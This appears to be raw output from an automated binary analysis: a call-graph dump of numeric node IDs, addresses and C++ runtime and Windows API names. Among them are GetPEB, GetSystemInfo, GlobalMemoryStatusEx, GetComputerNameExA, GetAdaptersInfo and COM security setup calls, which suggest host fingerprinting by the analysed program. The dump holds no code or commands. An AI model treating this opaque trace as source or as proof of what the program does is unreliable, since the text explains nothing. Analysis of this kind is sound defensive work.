46911 7faf1cf0 GetPEB 45791->46911 45793->45793 45795 7fae5360 numpunct 26 API calls 45793->45795 45794 7fb27bb8 45794->45787 45797 7fb2843d 45794->45797 45796 7fb27c93 45795->45796 45798 7fb34390 92 API calls 45796->45798 45799 7faf63a0 std::ios_base::clear 26 API calls 45797->45799 45810 7fb27ca7 std::ios_base::clear 45798->45810 45801 7fb28451 45799->45801 45800 7fb27d13 45803 7faf63a0 std::ios_base::clear 26 API calls 45800->45803 45802 7faf63a0 std::ios_base::clear 26 API calls 45801->45802 45804 7fb28472 45802->45804 45805 7fb27d2a 45803->45805 46918 7fb172d0 88 API calls 4 library calls 45804->46918 45807 7faf63a0 std::ios_base::clear 26 API calls 45805->45807 45813 7fb27d48 45807->45813 45808 7fb2847f 45809 7fb120f0 std::ios_base::clear 11 API calls 45808->45809 45811 7fb284a0 45809->45811 45810->45800 46912 7faf1cf0 GetPEB 45810->46912 45812 7fb120f0 std::ios_base::clear 11 API calls 45811->45812 45815 7fb284af 45812->45815 45813->45813 45818 7fae5360 numpunct 26 API calls 45813->45818 45817 7fb120f0 std::ios_base::clear 11 API calls 45815->45817 45816 7fb27d06 45816->45800 45823 7fb28374 45816->45823 45819 7fb284bb 45817->45819 45820 7fb27dd7 45818->45820 45821 7fb120f0 std::ios_base::clear 11 API calls 45819->45821 45822 7fb34390 92 API calls 45820->45822 45825 7fb284c7 45821->45825 45842 7fb27deb std::ios_base::clear 45822->45842 45824 7faf63a0 std::ios_base::clear 26 API calls 45823->45824 45826 7fb28388 45824->45826 45827 7fb13200 Concurrency::cancellation_token_source::~cancellation_token_source 80 API calls 45825->45827 45829 7faf63a0 std::ios_base::clear 26 API calls 45826->45829 45831 7fb284d3 45827->45831 45828 7fb27e57 45830 7faf63a0 std::ios_base::clear 26 API calls 45828->45830 45832 7fb283a9 45829->45832 45833 7fb27e6e 45830->45833 45834 7fb17680 Concurrency::cancellation_token_source::~cancellation_token_source 81 API calls 45831->45834 46917 7fb172d0 88 API calls 4 library calls 45832->46917 45836 7faf63a0 std::ios_base::clear 26 API calls 45833->45836 45837 7fb284e0 45834->45837 45846 7fb27e8c 45836->45846 45839 7fb120f0 std::ios_base::clear 11 API calls 45837->45839 45838 7fb283b6 45840 7fb120f0 std::ios_base::clear 11 API calls 45838->45840 45841 7fb28294 45839->45841 45843 7fb283d7 45840->45843 45841->45476 45842->45828 46913 7faf1cf0 GetPEB 45842->46913 45845 7fb120f0 std::ios_base::clear 11 API calls 45843->45845 45848 7fb283e6 45845->45848 45846->45846 45850 7fae5360 numpunct 26 API calls 45846->45850 45847 7fb27e4a 45847->45828 45853 7fb2829c 45847->45853 45849 7fb120f0 std::ios_base::clear 11 API calls 45848->45849 45851 7fb283f5 45849->45851 45852 7fb27f2e 45850->45852 45854 7fb120f0 std::ios_base::clear 11 API calls 45851->45854 45855 7fb34390 92 API calls 45852->45855 45857 7faf63a0 std::ios_base::clear 26 API calls 45853->45857 45856 7fb28401 45854->45856 45871 7fb27f42 std::ios_base::clear 45855->45871 45858 7fb120f0 std::ios_base::clear 11 API calls 45856->45858 45860 7fb282b0 45857->45860 45861 7fb2840d 45858->45861 45859 7fb27fb7 GetPEB 45875 7fb28001 45859->45875 45862 7faf63a0 std::ios_base::clear 26 API calls 45860->45862 45863 7fb13200 Concurrency::cancellation_token_source::~cancellation_token_source 80 API calls 45861->45863 45864 7fb282d1 45862->45864 45865 7fb28419 45863->45865 46916 7fb172d0 88 API calls 4 library calls 45864->46916 45867 7fb17680 Concurrency::cancellation_token_source::~cancellation_token_source 81 API calls 45865->45867 45870 7fb28426 45867->45870 45868 7fb282de 45869 7fb120f0 std::ios_base::clear 11 API calls 45868->45869 45872 7fb282ff 45869->45872 45873 7fb120f0 std::ios_base::clear 11 API calls 45870->45873 45871->45859 46914 7faf1cf0 GetPEB 45871->46914 45874 7fb120f0 std::ios_base::clear 11 API calls 45872->45874 45873->45841 45877 7fb2830e 45874->45877 45880 7faf63a0 std::ios_base::clear 26 API calls 45875->45880 45879 7fb120f0 std::ios_base::clear 11 API calls 45877->45879 45878 7fb27faa 45878->45859 45878->45875 45882 7fb2831d 45879->45882 45881 7fb281c9 45880->45881 45883 7faf63a0 std::ios_base::clear 26 API calls 45881->45883 45884 7fb120f0 std::ios_base::clear 11 API calls 45882->45884 45885 7fb281ea 45883->45885 45886 7fb2832c 45884->45886 46915 7fb172d0 88 API calls 4 library calls 45885->46915 45888 7fb120f0 std::ios_base::clear 11 API calls 45886->45888 45890 7fb28338 45888->45890 45889 7fb281f7 45891 7fb120f0 std::ios_base::clear 11 API calls 45889->45891 45892 7fb120f0 std::ios_base::clear 11 API calls 45890->45892 45893 7fb28218 45891->45893 45894 7fb28344 45892->45894 45895 7fb120f0 std::ios_base::clear 11 API calls 45893->45895 45896 7fb13200 Concurrency::cancellation_token_source::~cancellation_token_source 80 API calls 45894->45896 45897 7fb28227 45895->45897 45898 7fb28350 45896->45898 45899 7fb120f0 std::ios_base::clear 11 API calls 45897->45899 45900 7fb17680 Concurrency::cancellation_token_source::~cancellation_token_source 81 API calls 45898->45900 45901 7fb28236 45899->45901 45902 7fb2835d 45900->45902 45904 7fb120f0 std::ios_base::clear 11 API calls 45901->45904 45903 7fb120f0 std::ios_base::clear 11 API calls 45902->45903 45903->45841 45905 7fb28245 45904->45905 45906 7fb120f0 std::ios_base::clear 11 API calls 45905->45906 45907 7fb28254 45906->45907 45908 7fb120f0 std::ios_base::clear 11 API calls 45907->45908 45909 7fb28260 45908->45909 45910 7fb120f0 std::ios_base::clear 11 API calls 45909->45910 45911 7fb2826c 45910->45911 45912 7fb13200 Concurrency::cancellation_token_source::~cancellation_token_source 80 API calls 45911->45912 45913 7fb28278 45912->45913 45914 7fb17680 Concurrency::cancellation_token_source::~cancellation_token_source 81 API calls 45913->45914 45915 7fb28285 45914->45915 45916 7fb120f0 std::ios_base::clear 11 API calls 45915->45916 45916->45841 45918 7fae3160 81 API calls 45917->45918 45919 7fae4507 45918->45919 45920 7fb13200 Concurrency::cancellation_token_source::~cancellation_token_source 80 API calls 45919->45920 45921 7fae453f 45920->45921 45922 7fb17680 Concurrency::cancellation_token_source::~cancellation_token_source 81 API calls 45921->45922 45923 7fae454c 45922->45923 45923->45476 45925 7faf683a 45924->45925 45925->45925 45926 7fae5360 numpunct 26 API calls 45925->45926 45927 7faf6871 45926->45927 45927->45476 45929 7fb13200 Concurrency::cancellation_token_source::~cancellation_token_source 80 API calls 45928->45929 45930 7faf9d71 45929->45930 45931 7fb13200 Concurrency::cancellation_token_source::~cancellation_token_source 80 API calls 45930->45931 45932 7faf9df3 45931->45932 45933 7fb13200 Concurrency::cancellation_token_source::~cancellation_token_source 80 API calls 45932->45933 45934 7faf9e01 45933->45934 45935 7fb17680 Concurrency::cancellation_token_source::~cancellation_token_source 81 API calls 45934->45935 45936 7faf9e0e GetPEB 45935->45936 45936->45476 45937->45476 45938->45476 45939->45476 45940->45476 45941->45476 45942->45476 45943->45476 45944->45476 45945->45476 45946->45476 45947->45476 45948->45476 45949->45476 45950->45476 45951->45476 45952->45476 45953->45461 45954->45463 45955->45465 45957 7fb3f62b _memcpy_s 45956->45957 45957->45501 45959 7fae5377 numpunct 45958->45959 45961 7fae5381 numpunct 45959->45961 46009 7fb123f0 15 API calls numpunct 45959->46009 45963 7fae539a ctype 45961->45963 46010 7fae49f0 14 API calls 2 library calls 45961->46010 45963->45505 46011 7fae5980 45964->46011 45968 7faf7e9b 45967->45968 45969 7fae5360 numpunct 26 API calls 45968->45969 45970 7faf7f96 45969->45970 45970->45970 45971 7fae5360 numpunct 26 API calls 45970->45971 45972 7faf800f 45971->45972 45972->45972 45973 7fae5360 numpunct 26 API calls 45972->45973 45974 7faf80af 45973->45974 45975 7faf7700 26 API calls 45974->45975 45976 7faf80e7 45975->45976 46064 7faf9e80 45976->46064 45979 7faf9e80 26 API calls 45980 7faf811e 45979->45980 45981 7faf9e80 26 API calls 45980->45981 45982 7faf812d 45981->45982 45983 7faf9e80 26 API calls 45982->45983 45988 7faf813c Concurrency::cancellation_token_source::~cancellation_token_source 45983->45988 45984 7faf823c 45985 7fb120f0 std::ios_base::clear 11 API calls 45984->45985 45987 7faf8248 45985->45987 45986 7faf63a0 std::ios_base::clear 26 API calls 45986->45988 45989 7fb120f0 std::ios_base::clear 11 API calls 45987->45989 45988->45984 45988->45986 45993 7fb120f0 std::ios_base::clear 11 API calls 45988->45993 46068 7fae6010 45988->46068 45991 7faf8254 45989->45991 45992 7fb120f0 std::ios_base::clear 11 API calls 45991->45992 45994 7faf8260 45992->45994 45993->45988 45995 7fb120f0 std::ios_base::clear 11 API calls 45994->45995 45996 7faf826c 45995->45996 45997 7fb11d30 11 API calls 45996->45997 45998 7faf827b 45997->45998 45999 7fb11d30 45998->45999 46002 7fb11d7e 45999->46002 46000 7fb11da4 46004 7fb11dda error_info_injector 46000->46004 46094 7fb0e850 11 API calls Concurrency::cancellation_token_source::~cancellation_token_source 46000->46094 46002->46000 46093 7fae90d0 11 API calls 3 library calls 46002->46093 46004->45531 46006 7fb1211d 46005->46006 46008 7fb12184 error_info_injector 46006->46008 46095 7fb0e850 11 API calls Concurrency::cancellation_token_source::~cancellation_token_source 46006->46095 46008->45533 46009->45961 46010->45963 46018 7fae4ae0 46011->46018 46019 7fae4b0b 46018->46019 46020 7fae4b06 46018->46020 46027 7fae4b77 46019->46027 46038 7fb12df0 46019->46038 46029 7fae4f20 46020->46029 46022 7fae4c95 46047 7faf8c30 46022->46047 46024 7fb12df0 14 API calls 46024->46027 46026 7faf63a0 std::ios_base::clear 26 API calls 46026->46027 46027->46022 46027->46024 46028 7faf63a0 std::ios_base::clear 26 API calls 46027->46028 46028->46027 46030 7fb12df0 14 API calls 46029->46030 46031 7fae4f6e 46030->46031 46032 7faf8c30 11 API calls 46031->46032 46033 7fae510e 46032->46033 46034 7faf8e60 46033->46034 46035 7faf8e77 46034->46035 46036 7fae5a06 46034->46036 46035->46036 46063 7fae90d0 11 API calls 3 library calls 46035->46063 46036->45507 46039 7fb12e12 46038->46039 46040 7fb12e0d 46038->46040 46042 7fb12e35 46039->46042 46043 7fb12e24 46039->46043 46051 7fb11a70 RaiseException std::ios_base::clear Concurrency::cancel_current_task 46040->46051 46045 7fae4b45 46042->46045 46053 7fb407db 46042->46053 46052 7fae4a70 14 API calls 3 library calls 46043->46052 46045->46026 46048 7faf8c57 46047->46048 46049 7faf8c96 error_info_injector 46047->46049 46048->46049 46062 7fb0e850 11 API calls Concurrency::cancellation_token_source::~cancellation_token_source 46048->46062 46049->46020 46051->46039 46052->46045 46054 7fb407e0 _Yarn 46053->46054 46055 7fb407fa 46054->46055 46057 7fb407fc Concurrency::cancel_current_task 46054->46057 46060 7fb50396 EnterCriticalSection LeaveCriticalSection std::_Facet_Register 46054->46060 46055->46045 46061 7fb41ac5 RaiseException 46057->46061 46059 7fb41401 46060->46054 46061->46059 46062->46049 46063->46035 46065 7faf8112 46064->46065 46066 7faf9e9c 46064->46066 46065->45979 46076 7fb13290 46066->46076 46069 7fae604a 46068->46069 46070 7fae6080 46069->46070 46092 7fb3fba8 15 API calls 2 library calls 46069->46092 46081 7fae3710 46070->46081 46073 7fae60ae 46086 7faf8e00 46073->46086 46077 7fb132e0 46076->46077 46078 7fb132a4 std::ios_base::clear 46076->46078 46080 7fae9980 26 API calls 4 library calls 46077->46080 46078->46065 46080->46078 46082 7fb12df0 14 API calls 46081->46082 46083 7fae375d 46082->46083 46084 7faf63a0 std::ios_base::clear 26 API calls 46083->46084 46085 7fae379b 46084->46085 46085->46073 46087 7faf8e34 error_info_injector 46086->46087 46088 7faf8e12 46086->46088 46090 7faf8c30 11 API calls 46087->46090 46089 7fb120f0 std::ios_base::clear 11 API calls 46088->46089 46089->46087 46091 7fae60d2 46090->46091 46091->45988 46093->46002 46094->46004 46095->46008 46103 7fae4cc0 46096->46103 46099 7fae4f20 14 API calls 46100 7fae5a97 46099->46100 46101 7faf8e60 11 API calls 46100->46101 46102 7fae5aa6 46101->46102 46102->45545 46104 7fae4ce9 46103->46104 46105 7fae4d07 46104->46105 46106 7fb12df0 14 API calls 46104->46106 46112 7fae4d84 46104->46112 46105->46099 46107 7fae4d46 46106->46107 46108 7faf63a0 std::ios_base::clear 26 API calls 46107->46108 46108->46112 46109 7fae4efa 46110 7faf8c30 11 API calls 46109->46110 46110->46105 46111 7fb12df0 14 API calls 46111->46112 46112->46109 46112->46111 46113 7faf63a0 std::ios_base::clear 26 API calls 46112->46113 46113->46112 46115 7fb12df0 14 API calls 46114->46115 46116 7faf860e 46115->46116 46116->45549 46119 7fb2e3c3 46117->46119 46118 7fb2e3f2 GetPEB 46120 7fb2e431 46118->46120 46119->46118 46278 7faf1f00 46120->46278 46123 7fb2e623 46126 7fb13290 26 API calls 46123->46126 46124 7fb2e5be 46125 7fb13290 26 API calls 46124->46125 46127 7faf862a 46125->46127 46126->46127 46128 7fb29a90 GetPEB 46127->46128 46129 7fb29adf 46128->46129 46130 7fb29c50 46129->46130 46131 7fb29ca9 46129->46131 46133 7fb13290 26 API calls 46130->46133 46132 7fb13290 26 API calls 46131->46132 46134 7faf8632 46132->46134 46133->46134 46135 7fb2d3e0 GetPEB 46134->46135 46136 7fb2d546 46135->46136 46137 7fb2d77e GetPEB 46136->46137 46138 7fb2d99d GetPEB 46136->46138 46143 7fb2d7b4 46137->46143 46139 7fb2da0b 46138->46139 46140 7fb2dc24 GetPEB 46139->46140 46139->46143 46140->46143 46141 7fb2de34 GetPEB 46144 7fb2de73 46141->46144 46143->46141 46143->46144 46145 7fb2e06f 46144->46145 46283 7fb41ac5 RaiseException 46144->46283 46146 7fb13290 26 API calls 46145->46146 46148 7fb2e103 46146->46148 46147 7faf863a 46150 7fb2c170 46147->46150 46148->46147 46148->46148 46149 7fb13290 26 API calls 46148->46149 46149->46147 46284 7faf2050 46150->46284 46154 7fb2c1d2 46155 7fb2c3a8 46154->46155 46156 7fb2c349 46154->46156 46288 7fb3e9e0 60 API calls _fwprintf_s 46155->46288 46159 7fb13290 26 API calls 46156->46159 46158 7fb2c3b9 46161 7fb13290 26 API calls 46158->46161 46160 7faf8642 46159->46160 46162 7fb29d20 46160->46162 46161->46160 46290 7fb2f830 46162->46290 46165 7fb29d42 46166 7fb13290 26 API calls 46165->46166 46167 7faf864a 46166->46167 46194 7fb2a560 46167->46194 46168 7fb29daf 46169 7fb2a12b 46168->46169 46173 7fb29f4b 46168->46173 46170 7fb2a1d1 46169->46170 46171 7fb2a169 46169->46171 46176 7fb2a1cc 46169->46176 46310 7faf1d20 46170->46310 46174 7fb13290 26 API calls 46171->46174 46314 7faf1f30 GetPEB 46173->46314 46174->46176 46328 7faf1f30 GetPEB 46176->46328 46179 7fb2a0be 46180 7fb13290 26 API calls 46179->46180 46180->46167 46182 7fb2a2f3 46316 7fb12420 46182->46316 46186 7fb2a327 46325 7fb3e9e0 60 API calls _fwprintf_s 46186->46325 46188 7fb2a33a 46189 7fb13290 26 API calls 46188->46189 46190 7fb2a39e 46189->46190 46326 7fb12a20 GetPEB GetPEB 46190->46326 46192 7fb2a3a7 46327 7faf1fc0 GetPEB 46192->46327 46196 7fb2a583 46194->46196 46195 7fb2a5b2 GetPEB 46197 7fb2a5fe 46195->46197 46196->46195 46198 7fb13290 26 API calls 46197->46198 46199 7fb2a830 46197->46199 46198->46199 46200 7fb2a84e GetPEB 46199->46200 46201 7fb2a8a5 46200->46201 46202 7fb2aa75 GetPEB 46201->46202 46203 7fb2aaa9 46201->46203 46202->46203 46204 7fb13290 26 API calls 46203->46204 46206 7fb2ad02 46204->46206 46205 7faf8652 46208 7fb2adb0 GetPEB 46205->46208 46206->46205 46207 7fb13290 26 API calls 46206->46207 46207->46205 46210 7fb2aded GetSystemInfo 46208->46210 46210->45564 46213 7fb2af83 46211->46213 46212 7fb2afb2 GetPEB 46214 7fb2aff1 46212->46214 46213->46212 46215 7faf1f00 GetPEB 46214->46215 46216 7fb2b174 46215->46216 46217 7fb2b1e6 46216->46217 46218 7fb2b17e 46216->46218 46219 7fb13290 26 API calls 46217->46219 46220 7fb13290 26 API calls 46218->46220 46221 7faf8662 46219->46221 46220->46221 46222 7fb2e1c0 GetPEB 46221->46222 46223 7fb2e207 GlobalMemoryStatusEx 46222->46223 46225 7fb2e37e __aulldiv 46223->46225 46225->45568 46232 7fb2e6f0 GetComputerNameExA 46226->46232 46228 7fb2e8d5 46230 7faf1f00 GetPEB 46228->46230 46229 7fb2e86a 46233 7fb13290 26 API calls 46229->46233 46231 7fb2e8e5 46230->46231 46235 7fb2e957 46231->46235 46236 7fb2e8ef 46231->46236 46232->46228 46232->46229 46234 7faf8672 46233->46234 46239 7fb2b260 46234->46239 46238 7fb13290 26 API calls 46235->46238 46237 7fb13290 26 API calls 46236->46237 46237->46234 46238->46234 46354 7fb40cc0 46239->46354 46243 7fb2b4d0 46247 7fb2b4ee GetPEB 46243->46247 46244 7fb2b2e1 GetAdaptersInfo 46244->46243 46245 7fb2b85e 46244->46245 46246 7fb2b886 GetPEB 46245->46246 46248 7fb2b8ed 46246->46248 46249 7fb2b5d7 46247->46249 46251 7fb2bafa GetPEB 46248->46251 46249->46249 46250 7fb13290 26 API calls 46249->46250 46252 7faf867a 46250->46252 46253 7fb2bb60 46251->46253 46271 7fb2c430 46252->46271 46254 7fb2bd94 GetPEB 46253->46254 46255 7fb2bdfb 46254->46255 46356 7faf1e70 GetPEB 46255->46356 46257 7fb2bff7 46357 7faf1c30 GetPEB 46257->46357 46259 7fb2c031 46358 7faf1c30 GetPEB 46259->46358 46261 7fb2c04d 46359 7faf1c30 GetPEB 46261->46359 46263 7fb2c087 46360 7faf1c30 GetPEB 46263->46360 46265 7fb2c0a3 46361 7faf1c30 GetPEB 46265->46361 46267 7fb2c0dd 46362 7fb3e9e0 60 API calls _fwprintf_s 46267->46362 46269 7fb2c0f3 46270 7fb13290 26 API calls 46269->46270 46270->46252 46272 7faf67d0 numpunct 26 API calls 46271->46272 46273 7fb2c45b 46272->46273 46274 7fae6010 26 API calls 46273->46274 46275 7fb2c47f 46274->46275 46276 7fb120f0 std::ios_base::clear 11 API calls 46275->46276 46277 7faf8682 46276->46277 46277->45575 46279 7faf1f0c 46278->46279 46280 7faf1f1e 46278->46280 46282 7fb2ed70 GetPEB 46279->46282 46280->46123 46280->46124 46282->46280 46283->46145 46285 7faf205c 46284->46285 46286 7faf206e GetPEB 46284->46286 46289 7fb2ed70 GetPEB 46285->46289 46286->46154 46288->46158 46289->46286 46291 7fb2f84f 46290->46291 46329 7faf1d50 46291->46329 46296 7fb2fb20 46337 7faf1f60 46296->46337 46299 7fb2fbd7 46345 7faf1f30 GetPEB 46299->46345 46301 7fb2fd32 46303 7fb2ffdc 46301->46303 46306 7fb2fe9b 46301->46306 46302 7fb29d33 46302->46165 46302->46168 46341 7faf1cc0 46303->46341 46346 7faf1f30 GetPEB 46306->46346 46308 7fb30154 46347 7faf1f30 GetPEB 46308->46347 46311 7faf1d2c 46310->46311 46312 7faf1d3e 46310->46312 46352 7fb2ed70 GetPEB 46311->46352 46315 7faf1ea0 GetPEB 46312->46315 46314->46179 46315->46182 46317 7fb1243d 46316->46317 46318 7fb1249c GetPEB 46317->46318 46319 7fb12513 GetPEB 46318->46319 46321 7fb12809 46319->46321 46353 7fb2e1b0 GetPEB 46321->46353 46323 7fb129c5 46324 7faf1db0 GetPEB 46323->46324 46324->46186 46325->46188 46326->46192 46327->46176 46328->46167 46330 7faf1d5c 46329->46330 46331 7faf1d6e 46329->46331 46348 7fb2ed70 GetPEB 46330->46348 46331->46302 46333 7faf1f90 46331->46333 46334 7faf1f9c 46333->46334 46335 7faf1fae CoInitializeSecurity 46333->46335 46349 7fb2ed70 GetPEB 46334->46349 46335->46296 46338 7faf1f6c 46337->46338 46339 7faf1f7e 46337->46339 46350 7fb2ed70 GetPEB 46338->46350 46339->46299 46339->46301 46342 7faf1ccc 46341->46342 46343 7faf1cde CoSetProxyBlanket 46341->46343 46351 7fb2ed70 GetPEB 46342->46351 46343->46302 46343->46308 46345->46302 46346->46302 46347->46302 46348->46331 46349->46335 46350->46339 46351->46343 46352->46312 46353->46323 46355 7fb2b26d GetPEB 46354->46355 46355->46244 46356->46257 46357->46259 46358->46261 46359->46263 46360->46265 46361->46267 46362->46269 46364 7fae54a7 numpunct 46363->46364 46366 7fae54b1 std::ios_base::clear 46364->46366 46369 7fb123f0 15 API calls numpunct 46364->46369 46368 7fae54ca ctype 46366->46368 46370 7fae49f0 14 API calls 2 library calls 46366->46370 46368->45582 46369->46366 46370->46368 46465 7faf5560 46371->46465 46374 7fb13200 Concurrency::cancellation_token_source::~cancellation_token_source 80 API calls 46375 7fae31af 46374->46375 46375->45586 46379 7faf5fbc 46376->46379 46378 7faf6061 46381 7faf6069 46378->46381 46382 7faf60e1 46378->46382 46380 7faf5fe0 46379->46380 46496 7fafd010 26 API calls 46379->46496 46380->46378 46386 7faf67d0 numpunct 26 API calls 46380->46386 46499 7faf8760 81 API calls 2 library calls 46381->46499 46501 7faebed0 81 API calls Concurrency::cancellation_token_source::~cancellation_token_source 46382->46501 46385 7faf60d9 46388 7fb13200 Concurrency::cancellation_token_source::~cancellation_token_source 80 API calls 46385->46388 46387 7faf601c 46386->46387 46497 7fb158b0 26 API calls 2 library calls 46387->46497 46391 7faf611d 46388->46391 46391->45590 46392 7faf6079 46392->46385 46500 7fafb180 81 API calls Concurrency::cancellation_token_source::~cancellation_token_source 46392->46500 46393 7faf603b 46498 7fb41ac5 RaiseException 46393->46498 46395 7faf604f 46396 7fb120f0 std::ios_base::clear 11 API calls 46395->46396 46396->46378 46502 7faf5590 46397->46502 46400 7fb13200 Concurrency::cancellation_token_source::~cancellation_token_source 80 API calls 46401 7fae320f 46400->46401 46401->45594 46403 7fae9635 46402->46403 46517 7fae37c0 46403->46517 46406 7fae3b50 46521 7faf54d0 46406->46521 46409 7fb13200 Concurrency::cancellation_token_source::~cancellation_token_source 80 API calls 46410 7fae3b9f 46409->46410 46410->45656 46534 7faf55d0 46411->46534 46414 7fb13200 Concurrency::cancellation_token_source::~cancellation_token_source 80 API calls 46415 7fae326f 46414->46415 46415->45682 46417 7fb13200 Concurrency::cancellation_token_source::~cancellation_token_source 80 API calls 46416->46417 46418 7faf5d6c 46417->46418 46419 7fb13200 Concurrency::cancellation_token_source::~cancellation_token_source 80 API calls 46418->46419 46420 7faf5d91 46419->46420 46421 7fb13200 46420->46421 46422 7fb1322c 46421->46422 46423 7fb1320f 46421->46423 46426 7fb13254 46422->46426 46591 7fb4f35d 80 API calls Concurrency::cancellation_token_source::~cancellation_token_source 46422->46591 46423->46422 46590 7fb4f35d 80 API calls Concurrency::cancellation_token_source::~cancellation_token_source 46423->46590 46428 7fb1327c 46426->46428 46592 7fb4f35d 80 API calls Concurrency::cancellation_token_source::~cancellation_token_source 46426->46592 46429 7fb17680 46428->46429 46430 7fb176b5 std::exception::exception 46429->46430 46431 7fb1789d 46430->46431 46432 7fb176bf 46430->46432 46464 7fb1786f Concurrency::cancellation_token_source::~cancellation_token_source 46431->46464 46595 7fb37c30 81 API calls Concurrency::cancellation_token_source::~cancellation_token_source 46431->46595 46593 7fb37c30 81 API calls Concurrency::cancellation_token_source::~cancellation_token_source 46432->46593 46435 7fb17d2b 46437 7fb17d50 46435->46437 46438 7fb17d37 46435->46438 46436 7fb176f6 Concurrency::cancellation_token_source::~cancellation_token_source 46594 7fae9830 81 API calls Concurrency::cancellation_token_source::~cancellation_token_source 46436->46594 46602 7faf8f90 81 API calls Concurrency::cancellation_token_source::~cancellation_token_source 46437->46602 46440 7fb17d41 46438->46440 46441 7fb17de2 46438->46441 46439 7faf5d30 Concurrency::cancellation_token_source::~cancellation_token_source 80 API calls 46439->46464 46447 7fb120f0 std::ios_base::clear 11 API calls 46440->46447 46455 7fb17d4b error_info_injector 46440->46455 46443 7fb11ff0 Concurrency::cancellation_token_source::~cancellation_token_source 81 API calls 46441->46443 46448 7fb17df8 error_info_injector 46443->46448 46445 7fb17d66 error_info_injector 46445->46455 46603 7fb0e850 11 API calls Concurrency::cancellation_token_source::~cancellation_token_source 46445->46603 46450 7fb17e8a error_info_injector 46447->46450 46448->46455 46604 7fb0e850 11 API calls Concurrency::cancellation_token_source::~cancellation_token_source 46448->46604 46449 7fb11ff0 Concurrency::cancellation_token_source::~cancellation_token_source 81 API calls 46453 7fb17f09 46449->46453 46450->46455 46605 7fb0e850 11 API calls Concurrency::cancellation_token_source::~cancellation_token_source 46450->46605 46451 7fb178e8 Concurrency::cancellation_token_source::~cancellation_token_source 46451->46464 46596 7fae6b30 81 API calls Concurrency::cancellation_token_source::~cancellation_token_source 46451->46596 46453->45696 46455->46449 46458 7fb13200 Concurrency::cancellation_token_source::~cancellation_token_source 80 API calls 46458->46464 46460 7fb17680 Concurrency::cancellation_token_source::~cancellation_token_source 81 API calls 46460->46464 46464->46435 46464->46439 46464->46458 46464->46460 46597 7fb34160 81 API calls 2 library calls 46464->46597 46598 7fae9830 81 API calls Concurrency::cancellation_token_source::~cancellation_token_source 46464->46598 46599 7fb14e80 81 API calls Concurrency::cancellation_token_source::~cancellation_token_source 46464->46599 46600 7fae6b30 81 API calls Concurrency::cancellation_token_source::~cancellation_token_source 46464->46600 46601 7fb14dd0 81 API calls Concurrency::cancellation_token_source::~cancellation_token_source 46464->46601 46470 7faeb820 46465->46470 46468 7fb13200 Concurrency::cancellation_token_source::~cancellation_token_source 80 API calls 46469 7fae31a4 46468->46469 46469->46374 46479 7fb12c30 46470->46479 46473 7faf67d0 numpunct 26 API calls 46474 7faeb8a6 46473->46474 46475 7faeb8cf 46474->46475 46492 7fb4f35d 80 API calls Concurrency::cancellation_token_source::~cancellation_token_source 46474->46492 46488 7faf9600 46475->46488 46478 7faeb90a 46478->46468 46480 7fb12c4a 46479->46480 46481 7fb12c4f 46479->46481 46493 7fb11a70 RaiseException std::ios_base::clear Concurrency::cancel_current_task 46480->46493 46483 7fb12c5f 46481->46483 46484 7fb12c70 46481->46484 46494 7fae4a70 14 API calls 3 library calls 46483->46494 46486 7fb407db std::_Facet_Register 3 API calls 46484->46486 46487 7faeb84c 46484->46487 46486->46487 46487->46473 46489 7faf9627 46488->46489 46490 7faf966c error_info_injector 46488->46490 46489->46490 46495 7fb0e850 11 API calls Concurrency::cancellation_token_source::~cancellation_token_source 46489->46495 46490->46478 46492->46475 46493->46481 46494->46487 46495->46490 46496->46379 46497->46393 46498->46395 46499->46392 46500->46392 46501->46385 46507 7faeb920 46502->46507 46505 7fb13200 Concurrency::cancellation_token_source::~cancellation_token_source 80 API calls 46506 7fae3204 46505->46506 46506->46400 46508 7fb12c30 14 API calls 46507->46508 46509 7faeb94c 46508->46509 46510 7faf63a0 std::ios_base::clear 26 API calls 46509->46510 46511 7faeb9a4 46510->46511 46512 7faeb9cd 46511->46512 46516 7fb4f35d 80 API calls Concurrency::cancellation_token_source::~cancellation_token_source 46511->46516 46513 7faf9600 11 API calls 46512->46513 46515 7faeba08 46513->46515 46515->46505 46516->46512 46518 7fae382f 46517->46518 46519 7fae3860 46517->46519 46518->46406 46520 7fae5360 numpunct 26 API calls 46519->46520 46520->46518 46526 7faeba20 46521->46526 46524 7fb13200 Concurrency::cancellation_token_source::~cancellation_token_source 80 API calls 46525 7fae3b94 46524->46525 46525->46409 46527 7fb12c30 14 API calls 46526->46527 46528 7faeba37 std::ios_base::clear 46527->46528 46529 7faebab1 46528->46529 46533 7fb4f35d 80 API calls Concurrency::cancellation_token_source::~cancellation_token_source 46528->46533 46531 7faf9600 11 API calls 46529->46531 46532 7faebae5 46531->46532 46532->46524 46533->46529 46537 7faeb6b0 46534->46537 46542 7faebff0 46537->46542 46540 7fb13200 Concurrency::cancellation_token_source::~cancellation_token_source 80 API calls 46541 7fae3264 46540->46541 46541->46414 46551 7fb12d10 46542->46551 46546 7faec08c 46547 7faec0b5 46546->46547 46568 7fb4f35d 80 API calls Concurrency::cancellation_token_source::~cancellation_token_source 46546->46568 46564 7faf9740 46547->46564 46550 7faeb6ff 46550->46540 46552 7fb12d2a 46551->46552 46553 7fb12d2f 46551->46553 46569 7fb11a70 RaiseException std::ios_base::clear Concurrency::cancel_current_task 46552->46569 46555 7fb12d50 46553->46555 46556 7fb12d3f 46553->46556 46558 7fb407db std::_Facet_Register 3 API calls 46555->46558 46559 7faec01c 46555->46559 46570 7fae4a70 14 API calls 3 library calls 46556->46570 46558->46559 46560 7fae39c0 46559->46560 46561 7fae3a25 46560->46561 46571 7fae58c0 46561->46571 46565 7faf9767 46564->46565 46566 7faf97ac error_info_injector 46564->46566 46565->46566 46589 7fb0e850 11 API calls Concurrency::cancellation_token_source::~cancellation_token_source 46565->46589 46566->46550 46568->46547 46569->46553 46570->46559 46572 7fae58fd 46571->46572 46573 7fae3a51 46571->46573 46579 7fb0e980 26 API calls Concurrency::cancellation_token_source::~cancellation_token_source 46572->46579 46573->46546 46575 7fae5909 46580 7faeacd0 81 API calls Concurrency::cancellation_token_source::~cancellation_token_source 46575->46580 46577 7fae593d 46577->46573 46581 7fb11ff0 46577->46581 46579->46575 46580->46577 46582 7fb120a0 error_info_injector 46581->46582 46583 7fb12044 46581->46583 46582->46573 46587 7fae5fb0 81 API calls 2 library calls 46583->46587 46585 7fb12059 46585->46582 46588 7fb0e850 11 API calls Concurrency::cancellation_token_source::~cancellation_token_source 46585->46588 46587->46585 46588->46582 46589->46566 46590->46422 46591->46426 46592->46428 46593->46436 46594->46464 46595->46451 46596->46451 46597->46464 46598->46464 46599->46464 46600->46464 46601->46464 46602->46445 46603->46455 46604->46455 46605->46455 46919 7faf71d0 46606->46919 46613 7fb26070 